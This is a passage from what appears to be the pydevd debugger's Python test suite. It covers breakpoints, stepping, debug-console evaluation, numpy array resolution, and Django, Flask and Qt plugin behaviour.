writer.write_add_breakpoint(6, 'Method1a')
writer.write_add_breakpoint(11, 'Method2')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111', line=11)
writer.write_step_return(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('111', line=6 if IS_JYTHON else 2) # not a return (it stopped in the other breakpoint)
writer.write_run_thread(hit.thread_id)
if not IS_JYTHON:
hit = writer.wait_for_breakpoint_hit('111', line=6)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_IRONPYTHON, reason='Failing on IronPython (needs to be investigated).')
def test_case_13(case_setup):
with case_setup.test_file('_debugger_case13.py') as writer:
def _ignore_stderr_line(line):
if original_ignore_stderr_line(line):
return True
if IS_JYTHON:
for expected in (
"RuntimeWarning: Parent module '_pydevd_bundle' not found while handling absolute import",
"import __builtin__"):
if expected in line:
return True
return False
original_ignore_stderr_line = writer._ignore_stderr_line
writer._ignore_stderr_line = _ignore_stderr_line
writer.write_add_breakpoint(35, 'main')
writer.write("%s\t%s\t%s" % (CMD_SET_PROPERTY_TRACE, writer.next_seq(), "true;false;false;true"))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111')
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('107', line=25)
# Should go inside setter method
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('107')
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('107', line=21)
# Should go inside getter method
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('107')
# Disable property tracing
writer.write("%s\t%s\t%s" % (CMD_SET_PROPERTY_TRACE, writer.next_seq(), "true;true;true;true"))
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('107', line=39)
# Should Skip step into properties setter
# Enable property tracing
writer.write("%s\t%s\t%s" % (CMD_SET_PROPERTY_TRACE, writer.next_seq(), "true;false;false;true"))
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('107', line=8)
# Should go inside getter method
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_14(case_setup):
# Interactive Debug Console
with case_setup.test_file('_debugger_case14.py') as writer:
writer.write_add_breakpoint(22, 'main')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111')
assert hit.thread_id, '%s not valid.' % hit.thread_id
assert hit.frame_id, '%s not valid.' % hit.frame_id
# Access some variable
writer.write_debug_console_expression("%s\t%s\tEVALUATE\tcarObj.color" % (hit.thread_id, hit.frame_id))
writer.wait_for_var(['<more>False</more>', '%27Black%27'])
        assert 7 == writer._sequence, 'Expected 7. Had: %s' % writer._sequence
# Change some variable
writer.write_debug_console_expression("%s\t%s\tEVALUATE\tcarObj.color='Red'" % (hit.thread_id, hit.frame_id))
writer.write_debug_console_expression("%s\t%s\tEVALUATE\tcarObj.color" % (hit.thread_id, hit.frame_id))
writer.wait_for_var(['<more>False</more>', '%27Red%27'])
        assert 11 == writer._sequence, 'Expected 11. Had: %s' % writer._sequence
# Iterate some loop
writer.write_debug_console_expression("%s\t%s\tEVALUATE\tfor i in range(3):" % (hit.thread_id, hit.frame_id))
writer.wait_for_var(['<xml><more>True</more></xml>'])
writer.write_debug_console_expression("%s\t%s\tEVALUATE\t print(i)" % (hit.thread_id, hit.frame_id))
writer.wait_for_var(['<xml><more>True</more></xml>'])
writer.write_debug_console_expression("%s\t%s\tEVALUATE\t" % (hit.thread_id, hit.frame_id))
writer.wait_for_var(
[
'<xml><more>False</more><output message="0"></output><output message="1"></output><output message="2"></output></xml>' ]
)
        assert 17 == writer._sequence, 'Expected 17. Had: %s' % writer._sequence
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_15(case_setup):
with case_setup.test_file('_debugger_case15.py') as writer:
writer.write_add_breakpoint(22, 'main')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT)
# Access some variable
writer.write_custom_operation("%s\t%s\tEXPRESSION\tcarObj.color" % (hit.thread_id, hit.frame_id), "EXEC", "f=lambda x: 'val=%s' % x", "f")
writer.wait_for_custom_operation('val=Black')
assert 7 == writer._sequence, 'Expected 7. Had: %s' % writer._sequence
writer.write_custom_operation("%s\t%s\tEXPRESSION\tcarObj.color" % (hit.thread_id, hit.frame_id), "EXECFILE", debugger_unittest._get_debugger_test_file('_debugger_case15_execfile.py'), "f")
writer.wait_for_custom_operation('val=Black')
assert 9 == writer._sequence, 'Expected 9. Had: %s' % writer._sequence
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_16_resolve_numpy_array(case_setup):
# numpy.ndarray resolver
try:
import numpy
except ImportError:
pytest.skip('numpy not available')
with case_setup.test_file('_debugger_case16.py') as writer:
writer.write_add_breakpoint(9, 'main')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT)
# In this test we check that the three arrays of different shapes, sizes and types
# are all resolved properly as ndarrays.
        # The first check is that all three expected variables are defined.
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_multiple_vars((
(
'<var name="smallarray" type="ndarray" qualifier="numpy" value="ndarray%253A %255B 0.%252B1.j 1.%252B1.j 2.%252B1.j 3.%252B1.j 4.%252B1.j 5.%252B1.j 6.%252B1.j 7.%252B1.j 8.%252B1.j%250A 9.%252B1.j 10.%252B1.j 11.%252B1.j 12.%252B1.j 13.%252B1.j 14.%252B1.j 15.%252B1.j 16.%252B1.j 17.%252B1.j%250A 18.%252B1.j 19.%252B1.j 20.%252B1.j 21.%252B1.j 22.%252B1.j 23.%252B1.j 24.%252B1.j 25.%252B1.j 26.%252B1.j%250A 27.%252B1.j 28.%252B1.j 29.%252B1.j 30.%252B1.j 31.%252B1.j 32.%252B1.j 33.%252B1.j 34.%252B1.j 35.%252B1.j%250A 36.%252B1.j 37.%252B1.j 38.%252B1.j 39.%252B1.j 40.%252B1.j 41.%252B1.j 42.%252B1.j 43.%252B1.j 44.%252B1.j%250A 45.%252B1.j 46.%252B1.j 47.%252B1.j 48.%252B1.j 49.%252B1.j 50.%252B1.j 51.%252B1.j 52.%252B1.j 53.%252B1.j%250A 54.%252B1.j 55.%252B1.j 56.%252B1.j 57.%252B1.j 58.%252B1.j 59.%252B1.j 60.%252B1.j 61.%252B1.j 62.%252B1.j%250A 63.%252B1.j 64.%252B1.j 65.%252B1.j 66.%252B1.j 67.%252B1.j 68.%252B1.j 69.%252B1.j 70.%252B1.j 71.%252B1.j%250A 72.%252B1.j 73.%252B1.j 74.%252B1.j 75.%252B1.j 76.%252B1.j 77.%252B1.j 78.%252B1.j 79.%252B1.j 80.%252B1.j%250A 81.%252B1.j 82.%252B1.j 83.%252B1.j 84.%252B1.j 85.%252B1.j 86.%252B1.j 87.%252B1.j 88.%252B1.j 89.%252B1.j%250A 90.%252B1.j 91.%252B1.j 92.%252B1.j 93.%252B1.j 94.%252B1.j 95.%252B1.j 96.%252B1.j 97.%252B1.j 98.%252B1.j%250A 99.%252B1.j%255D" isContainer="True" />',
'<var name="smallarray" type="ndarray" qualifier="numpy" value="ndarray%253A %255B 0.%252B1.j 1.%252B1.j 2.%252B1.j 3.%252B1.j 4.%252B1.j 5.%252B1.j 6.%252B1.j 7.%252B1.j%250A 8.%252B1.j 9.%252B1.j 10.%252B1.j 11.%252B1.j 12.%252B1.j 13.%252B1.j 14.%252B1.j 15.%252B1.j%250A 16.%252B1.j 17.%252B1.j 18.%252B1.j 19.%252B1.j 20.%252B1.j 21.%252B1.j 22.%252B1.j 23.%252B1.j%250A 24.%252B1.j 25.%252B1.j 26.%252B1.j 27.%252B1.j 28.%252B1.j 29.%252B1.j 30.%252B1.j 31.%252B1.j%250A 32.%252B1.j 33.%252B1.j 34.%252B1.j 35.%252B1.j 36.%252B1.j 37.%252B1.j 38.%252B1.j 39.%252B1.j%250A 40.%252B1.j 41.%252B1.j 42.%252B1.j 43.%252B1.j 44.%252B1.j 45.%252B1.j 46.%252B1.j 47.%252B1.j%250A 48.%252B1.j 49.%252B1.j 50.%252B1.j 51.%252B1.j 52.%252B1.j 53.%252B1.j 54.%252B1.j 55.%252B1.j%250A 56.%252B1.j 57.%252B1.j 58.%252B1.j 59.%252B1.j 60.%252B1.j 61.%252B1.j 62.%252B1.j 63.%252B1.j%250A 64.%252B1.j 65.%252B1.j 66.%252B1.j 67.%252B1.j 68.%252B1.j 69.%252B1.j 70.%252B1.j 71.%252B1.j%250A 72.%252B1.j 73.%252B1.j 74.%252B1.j 75.%252B1.j 76.%252B1.j 77.%252B1.j 78.%252B1.j 79.%252B1.j%250A 80.%252B1.j 81.%252B1.j 82.%252B1.j 83.%252B1.j 84.%252B1.j 85.%252B1.j 86.%252B1.j 87.%252B1.j%250A 88.%252B1.j 89.%252B1.j 90.%252B1.j 91.%252B1.j 92.%252B1.j 93.%252B1.j 94.%252B1.j 95.%252B1.j%250A 96.%252B1.j 97.%252B1.j 98.%252B1.j 99.%252B1.j%255D" isContainer="True" />'
),
(
'<var name="bigarray" type="ndarray" qualifier="numpy" value="ndarray%253A %255B%255B 0 1 2 ... 9997 9998 9999%255D%250A %255B10000 10001 10002 ... 19997 19998 19999%255D%250A %255B20000 20001 20002 ... 29997 29998 29999%255D%250A ...%250A %255B70000 70001 70002 ... 79997 79998 79999%255D%250A %255B80000 80001 80002 ... 89997 89998 89999%255D%250A %255B90000 90001 90002 ... 99997 99998 99999%255D%255D" isContainer="True" />',
'<var name="bigarray" type="ndarray" qualifier="numpy" value="ndarray%253A %255B%255B 0 1 2 ...%252C 9997 9998 9999%255D%250A %255B10000 10001 10002 ...%252C 19997 19998 19999%255D%250A %255B20000 20001 20002 ...%252C 29997 29998 29999%255D%250A ...%252C %250A %255B70000 70001 70002 ...%252C 79997 79998 79999%255D%250A %255B80000 80001 80002 ...%252C 89997 89998 89999%255D%250A %255B90000 90001 90002 ...%252C 99997 99998 99999%255D%255D" isContainer="True" />'
),
# Any of the ones below will do.
(
'<var name="hugearray" type="ndarray" qualifier="numpy" value="ndarray%253A %255B 0 1 2 ... 9999997 9999998 9999999%255D" isContainer="True" />',
'<var name="hugearray" type="ndarray" qualifier="numpy" value="ndarray%253A %255B 0 1 2 ...%252C 9999997 9999998 9999999%255D" isContainer="True" />'
)
))
# For each variable, check each of the resolved (meta data) attributes...
writer.write_get_variable(hit.thread_id, hit.frame_id, 'smallarray')
writer.wait_for_multiple_vars((
'<var name="min" type="complex128"',
'<var name="max" type="complex128"',
'<var name="shape" type="tuple"',
'<var name="dtype" type="dtype"',
'<var name="size" type="int"',
))
# ...and check that the internals are resolved properly
writer.write_get_variable(hit.thread_id, hit.frame_id, 'smallarray\t__internals__')
writer.wait_for_var('<var name="%27size%27')
writer.write_get_variable(hit.thread_id, hit.frame_id, 'bigarray')
        # isContainer could be true on some numpy versions, so, we only check the beginning of the var entry.
writer.wait_for_multiple_vars((
[
'<var name="min" type="int64" qualifier="numpy" value="int64%253A 0"',
'<var name="min" type="int64" qualifier="numpy" value="int64%3A 0"',
'<var name="size" type="int" qualifier="{0}" value="int%3A 100000"'.format(builtin_qualifier),
],
[
'<var name="max" type="int64" qualifier="numpy" value="int64%253A 99999"',
'<var name="max" type="int32" qualifier="numpy" value="int32%253A 99999"',
'<var name="max" type="int64" qualifier="numpy" value="int64%3A 99999"',
'<var name="max" type="int32" qualifier="numpy" value="int32%253A 99999"',
],
'<var name="shape" type="tuple"',
'<var name="dtype" type="dtype"',
'<var name="size" type="int"'
))
writer.write_get_variable(hit.thread_id, hit.frame_id, 'bigarray\t__internals__')
writer.wait_for_var('<var name="%27size%27')
# this one is different because it crosses the magic threshold where we don't calculate
# the min/max
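        # (instead of iterating the 10-million-element array, the resolver reports an explanatory
        # string for min/max, which is what's asserted below)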
writer.write_get_variable(hit.thread_id, hit.frame_id, 'hugearray')
writer.wait_for_var((
[
'<var name="min" type="str" qualifier={0} value="str%253A ndarray too big%252C calculating min would slow down debugging" />'.format(builtin_qualifier),
'<var name="min" type="str" qualifier={0} value="str%3A ndarray too big%252C calculating min would slow down debugging" />'.format(builtin_qualifier),
'<var name="min" type="str" qualifier="{0}" value="str%253A ndarray too big%252C calculating min would slow down debugging" />'.format(builtin_qualifier),
'<var name="min" type="str" qualifier="{0}" value="str%3A ndarray too big%252C calculating min would slow down debugging" />'.format(builtin_qualifier),
],
[
'<var name="max" type="str" qualifier={0} value="str%253A ndarray too big%252C calculating max would slow down debugging" />'.format(builtin_qualifier),
'<var name="max" type="str" qualifier={0} value="str%3A ndarray too big%252C calculating max would slow down debugging" />'.format(builtin_qualifier),
'<var name="max" type="str" qualifier="{0}" value="str%253A ndarray too big%252C calculating max would slow down debugging" />'.format(builtin_qualifier),
'<var name="max" type="str" qualifier="{0}" value="str%3A ndarray too big%252C calculating max would slow down debugging" />'.format(builtin_qualifier),
],
'<var name="shape" type="tuple"',
'<var name="dtype" type="dtype"',
'<var name="size" type="int"',
))
writer.write_get_variable(hit.thread_id, hit.frame_id, 'hugearray\t__internals__')
writer.wait_for_var('<var name="%27size%27')
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_17(case_setup):
# Check dont trace
with case_setup.test_file('_debugger_case17.py') as writer:
writer.write_enable_dont_trace(True)
writer.write_add_breakpoint(27, 'main')
writer.write_add_breakpoint(29, 'main')
writer.write_add_breakpoint(31, 'main')
writer.write_add_breakpoint(33, 'main')
writer.write_make_initial_run()
for _i in range(4):
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT)
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('107', line=2)
# Should Skip step into properties setter
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_17a(case_setup):
# Check dont trace return
with case_setup.test_file('_debugger_case17a.py') as writer:
writer.write_enable_dont_trace(True)
break1_line = writer.get_line_index_with_content('break 1 here')
writer.write_add_breakpoint(break1_line, 'm1')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT, line=break1_line)
writer.write_step_in(hit.thread_id)
break2_line = writer.get_line_index_with_content('break 2 here')
hit = writer.wait_for_breakpoint_hit('107', line=break2_line)
        # The don't-trace filter should skip the intermediate frame, so the step into lands in m3.
assert hit.name == 'm3'
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_18(case_setup):
# change local variable
if IS_IRONPYTHON or IS_JYTHON:
pytest.skip('Unsupported assign to local')
with case_setup.test_file('_debugger_case18.py') as writer:
writer.write_add_breakpoint(5, 'm2')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT, line=5)
writer.write_change_variable(hit.thread_id, hit.frame_id, 'a', '40')
writer.wait_for_var('<xml><var name="" type="int" qualifier="{0}" value="int%253A 40" />%0A</xml>'.format(builtin_qualifier,))
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_19(case_setup):
# Check evaluate '__' attributes
with case_setup.test_file('_debugger_case19.py') as writer:
writer.write_add_breakpoint(8, None)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT, line=8)
writer.write_evaluate_expression('%s\t%s\t%s' % (hit.thread_id, hit.frame_id, 'LOCAL'), 'a.__var')
writer.wait_for_evaluation([
[
'<var name="a.__var" type="int" qualifier="{0}" value="int'.format(builtin_qualifier),
'<var name="a.__var" type="int" value="int', # jython
]
])
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Monkey-patching related to starting threads not done on Jython.')
def test_case_20(case_setup):
    # Check that we were notified of thread creation before the threads started to run.
with case_setup.test_file('_debugger_case20.py') as writer:
writer.write_make_initial_run()
# We already check if it prints 'TEST SUCEEDED' by default, so, nothing
# else should be needed in this test as it tests what's needed just by
# running the module.
writer.finished_ok = True
@pytest.mark.skipif(not TEST_FLASK, reason='No flask available')
def test_case_flask(case_setup_flask):
with case_setup_flask.test_file(EXPECTED_RETURNCODE='any') as writer:
writer.write_multi_threads_single_notification(True)
writer.write_add_breakpoint_jinja2(5, None, 'hello.html')
writer.write_add_breakpoint_jinja2(8, None, 'hello.html')
writer.write_make_initial_run()
t = writer.create_request_thread()
time.sleep(2) # Give flask some time to get to startup before requesting the page
t.start()
hit = writer.wait_for_single_notification_as_hit(line=5)
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_vars(['<var name="content" type="str"'])
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_single_notification_as_hit(line=8)
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_vars(['<var name="content" type="str"'])
writer.write_run_thread(hit.thread_id)
contents = t.wait_for_contents()
assert '<title>Hello</title>' in contents
assert 'Flask-Jinja-Test' in contents
writer.finished_ok = True
@pytest.mark.skipif(not TEST_DJANGO, reason='No django available')
def test_case_django_a(case_setup_django):
def get_environ(writer):
env = os.environ.copy()
env.update({
'PYDEVD_FILTER_LIBRARIES': '1', # Global setting for in project or not
})
return env
with case_setup_django.test_file(EXPECTED_RETURNCODE='any', get_environ=get_environ) as writer:
writer.write_add_breakpoint_django(5, None, 'index.html')
writer.write_make_initial_run()
t = writer.create_request_thread('my_app')
time.sleep(5) # Give django some time to get to startup before requesting the page
t.start()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT, line=5)
writer.write_get_variable(hit.thread_id, hit.frame_id, 'entry')
writer.wait_for_vars([
'<var name="key" type="str"',
'v1'
])
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT, line=5)
writer.write_get_variable(hit.thread_id, hit.frame_id, 'entry')
writer.wait_for_vars([
'<var name="key" type="str"',
'v2'
])
writer.write_run_thread(hit.thread_id)
contents = t.wait_for_contents()
contents = contents.replace(' ', '').replace('\r', '').replace('\n', '')
if contents != '<ul><li>v1:v1</li><li>v2:v2</li></ul>':
raise AssertionError('%s != <ul><li>v1:v1</li><li>v2:v2</li></ul>' % (contents,))
writer.finished_ok = True
@pytest.mark.skipif(not TEST_DJANGO, reason='No django available')
def test_case_django_b(case_setup_django):
with case_setup_django.test_file(EXPECTED_RETURNCODE='any') as writer:
writer.write_add_breakpoint_django(4, None, 'name.html')
writer.write_add_exception_breakpoint_django()
writer.write_remove_exception_breakpoint_django()
writer.write_make_initial_run()
t = writer.create_request_thread('my_app/name')
time.sleep(5) # Give django some time to get to startup before requesting the page
t.start()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT, line=4)
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_var('<var name="form" type="NameForm" qualifier="my_app.forms" value="NameForm%253A')
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not TEST_DJANGO, reason='No django available')
def test_case_django_template_inherits_no_exception(case_setup_django):
with case_setup_django.test_file(EXPECTED_RETURNCODE='any') as writer:
# Check that it doesn't have issues with inherits + django exception breakpoints.
writer.write_add_exception_breakpoint_django()
writer.write_make_initial_run()
t = writer.create_request_thread('my_app/inherits')
time.sleep(5) # Give django some time to get to startup before requesting the page
t.start()
contents = t.wait_for_contents()
contents = contents.replace(' ', '').replace('\r', '').replace('\n', '')
assert contents == '''"chat_mode=True""chat_mode=False"'''
writer.finished_ok = True
@pytest.mark.skipif(not TEST_DJANGO, reason='No django available')
def test_case_django_no_var_error(case_setup_django):
with case_setup_django.test_file(EXPECTED_RETURNCODE='any') as writer:
        # Check that a missing variable in the template doesn't trigger the django exception breakpoint.
writer.write_add_exception_breakpoint_django()
writer.write_make_initial_run()
t = writer.create_request_thread('my_app/no_var_error')
time.sleep(5) # Give django some time to get to startup before requesting the page
t.start()
contents = t.wait_for_contents()
contents = contents.replace(' ', '').replace('\r', '').replace('\n', '')
assert contents == '''no_pat_name'''
writer.finished_ok = True
@pytest.mark.skipif(not TEST_DJANGO, reason='No django available')
@pytest.mark.parametrize("jmc", [False, True])
def test_case_django_no_attribute_exception_breakpoint(case_setup_django, jmc):
kwargs = {}
if jmc:
def get_environ(writer):
env = os.environ.copy()
env.update({
'PYDEVD_FILTER_LIBRARIES': '1', # Global setting for in project or not
})
return env
kwargs['get_environ'] = get_environ
with case_setup_django.test_file(EXPECTED_RETURNCODE='any', **kwargs) as writer:
writer.write_add_exception_breakpoint_django()
writer.write_make_initial_run()
t = writer.create_request_thread('my_app/template_error')
time.sleep(5) # Give django some time to get to startup before requesting the page
t.start()
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION, line=7, file='template_error.html')
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_var('<var name="entry" type="Entry" qualifier="my_app.views" value="Entry: v1:v1" isContainer="True"')
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not TEST_DJANGO, reason='No django available')
def test_case_django_no_attribute_exception_breakpoint_and_regular_exceptions(case_setup_django):
with case_setup_django.test_file(EXPECTED_RETURNCODE='any') as writer:
writer.write_add_exception_breakpoint_django()
# The django plugin has priority over the regular exception breakpoint.
writer.write_add_exception_breakpoint_with_policy(
'django.template.base.VariableDoesNotExist',
notify_on_handled_exceptions=2, # 2 means notify only on first raise.
notify_on_unhandled_exceptions=0,
ignore_libraries=0
)
writer.write_make_initial_run()
t = writer.create_request_thread('my_app/template_error')
time.sleep(5) # Give django some time to get to startup before requesting the page
t.start()
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION, line=7, file='template_error.html')
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_var('<var name="entry" type="Entry" qualifier="my_app.views" value="Entry: v1:v1" isContainer="True"')
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not TEST_DJANGO, reason='No django available')
@pytest.mark.parametrize("jmc", [False, True])
def test_case_django_invalid_template_exception_breakpoint(case_setup_django, jmc):
kwargs = {}
if jmc:
def get_environ(writer):
env = os.environ.copy()
env.update({
'PYDEVD_FILTER_LIBRARIES': '1', # Global setting for in project or not
})
return env
kwargs['get_environ'] = get_environ
with case_setup_django.test_file(EXPECTED_RETURNCODE='any', **kwargs) as writer:
writer.write_add_exception_breakpoint_django()
writer.write_make_initial_run()
t = writer.create_request_thread('my_app/template_error2')
time.sleep(5) # Give django some time to get to startup before requesting the page
t.start()
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION, line=4, file='template_error2.html')
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_var('<var name="token" type="Token" qualifier="django.template.base" value="Token:')
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not TEST_CYTHON, reason='No cython available')
def test_cython(case_setup):
from _pydevd_bundle import pydevd_cython
assert pydevd_cython.trace_dispatch is not None
def _has_qt():
try:
try:
from PySide import QtCore # @UnresolvedImport
return True
except:
from PySide2 import QtCore # @UnresolvedImport
return True
except:
try:
from PyQt4 import QtCore # @UnresolvedImport
return True
except:
try:
from PyQt5 import QtCore # @UnresolvedImport
return True
except:
pass
return False
@pytest.mark.skipif(not _has_qt(), reason='No qt available')
def test_case_qthread1(case_setup):
with case_setup.test_file('_debugger_case_qthread1.py') as writer:
breakpoint_id = writer.write_add_breakpoint(writer.get_line_index_with_content('break here'), 'run')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(hit.thread_id)
writer.log.append('Checking sequence. Found: %s' % (writer._sequence))
assert 9 == writer._sequence, 'Expected 9. Had: %s' % writer._sequence
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.skipif(not _has_qt(), reason='No qt available')
def test_case_qthread2(case_setup):
with case_setup.test_file('_debugger_case_qthread2.py') as writer:
breakpoint_id = writer.write_add_breakpoint(writer.get_line_index_with_content('break here'), 'long_running')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(thread_id)
writer.log.append('Checking sequence. Found: %s' % (writer._sequence))
assert 9 == writer._sequence, 'Expected 9. Had: %s' % writer._sequence
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.skipif(not _has_qt(), reason='No qt available')
def test_case_qthread3(case_setup):
with case_setup.test_file('_debugger_case_qthread3.py') as writer:
breakpoint_id = writer.write_add_breakpoint(writer.get_line_index_with_content('break here'), 'run')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(thread_id)
writer.log.append('Checking sequence. Found: %s' % (writer._sequence))
assert 9 == writer._sequence, 'Expected 9. Had: %s' % writer._sequence
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.skipif(not _has_qt(), reason='No qt available')
def test_case_qthread4(case_setup):
with case_setup.test_file('_debugger_case_qthread4.py') as writer:
original_additional_output_checks = writer.additional_output_checks
def additional_output_checks(stdout, stderr):
original_additional_output_checks(stdout, stderr)
if 'On start called' not in stdout:
raise AssertionError('Expected "On start called" to be in stdout:\n%s' % (stdout,))
if 'Done sleeping' not in stdout:
raise AssertionError('Expected "Done sleeping" to be in stdout:\n%s' % (stdout,))
if 'native Qt signal is not callable' in stderr:
raise AssertionError('Did not expect "native Qt signal is not callable" to be in stderr:\n%s' % (stderr,))
breakpoint_id = writer.write_add_breakpoint(28, 'on_start') # breakpoint on print('On start called2').
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(hit.thread_id)
writer.log.append('Checking sequence. Found: %s' % (writer._sequence))
assert 9 == writer._sequence, 'Expected 9. Had: %s' % writer._sequence
writer.log.append('Marking finished ok.')
writer.finished_ok = True
def test_m_switch(case_setup_m_switch):
with case_setup_m_switch.test_file() as writer:
writer.log.append('writing add breakpoint')
breakpoint_id = writer.write_add_breakpoint(1, None)
writer.log.append('making initial run')
writer.write_make_initial_run()
writer.log.append('waiting for breakpoint hit')
hit = writer.wait_for_breakpoint_hit()
writer.write_remove_breakpoint(breakpoint_id)
writer.log.append('run thread')
writer.write_run_thread(hit.thread_id)
writer.log.append('asserting')
try:
assert 9 == writer._sequence, 'Expected 9. Had: %s' % writer._sequence
except:
writer.log.append('assert failed!')
raise
writer.log.append('asserted')
writer.finished_ok = True
def test_module_entry_point(case_setup_m_switch_entry_point):
with case_setup_m_switch_entry_point.test_file() as writer:
writer.log.append('writing add breakpoint')
breakpoint_id = writer.write_add_breakpoint(1, None)
writer.log.append('making initial run')
writer.write_make_initial_run()
writer.log.append('waiting for breakpoint hit')
hit = writer.wait_for_breakpoint_hit()
writer.write_remove_breakpoint(breakpoint_id)
writer.log.append('run thread')
writer.write_run_thread(hit.thread_id)
writer.log.append('asserting')
try:
assert 9 == writer._sequence, 'Expected 9. Had: %s' % writer._sequence
except:
writer.log.append('assert failed!')
raise
writer.log.append('asserted')
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_check_tracer_with_exceptions(case_setup):
def get_environ(writer):
env = os.environ.copy()
# This test requires regular tracing (without cython).
env['PYDEVD_USE_CYTHON'] = 'NO'
env['PYDEVD_USE_FRAME_EVAL'] = 'NO'
return env
with case_setup.test_file('_debugger_case_check_tracer.py', get_environ=get_environ) as writer:
writer.write_add_exception_breakpoint_with_policy('IndexError', "1", "1", "1")
writer.write_make_initial_run()
writer.finished_ok = True
@pytest.mark.parametrize('target_file', [
'_debugger_case_unhandled_exceptions_generator.py',
'_debugger_case_unhandled_exceptions_listcomp.py',
])
@pytest.mark.parametrize('unhandled', [False, True])
@pytest.mark.skipif(IS_JYTHON, reason='Not ok for Jython.')
def test_case_handled_and_unhandled_exception_generator(case_setup, target_file, unhandled):
def check_test_suceeded_msg(writer, stdout, stderr):
# Don't call super (we have an unhandled exception in the stack trace).
return 'TEST SUCEEDED' in ''.join(stdout) and 'TEST SUCEEDED' in ''.join(stderr)
def additional_output_checks(writer, stdout, stderr):
if 'ZeroDivisionError' not in stderr:
raise AssertionError('Expected test to have an unhandled exception.\nstdout:\n%s\n\nstderr:\n%s' % (
stdout, stderr))
with case_setup.test_file(
target_file,
check_test_suceeded_msg=check_test_suceeded_msg,
additional_output_checks=additional_output_checks,
EXPECTED_RETURNCODE=1,
) as writer:
if unhandled:
writer.write_add_exception_breakpoint_with_policy('Exception', "0", "1", "0")
else:
writer.write_add_exception_breakpoint_with_policy('Exception', "1", "0", "0")
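        # Note: the positional flags mirror the keyword form used elsewhere in this file:
        # (exception, notify_on_handled_exceptions, notify_on_unhandled_exceptions, ignore_libraries).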
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION if unhandled else REASON_CAUGHT_EXCEPTION)
assert hit.line == writer.get_line_index_with_content('# exc line')
if 'generator' in target_file:
expected_frame_names = ['<genexpr>', 'f', '<module>']
else:
if IS_PY27 or IS_PY26:
expected_frame_names = ['f', '<module>']
else:
expected_frame_names = ['<listcomp>', 'f', '<module>']
writer.write_get_current_exception(hit.thread_id)
msg = writer.wait_for_message(accept_message=lambda msg:'exc_type="' in msg and 'exc_desc="' in msg, unquote_msg=False)
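        # unquote_msg=False keeps the payload quoted/escaped, so the frame names are unquoted and
        # XML-unescaped by hand on the next line.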
        frame_names = [unquote(f['name']).replace('&lt;', '<').replace('&gt;', '>') for f in msg.thread.frame]
assert frame_names == expected_frame_names
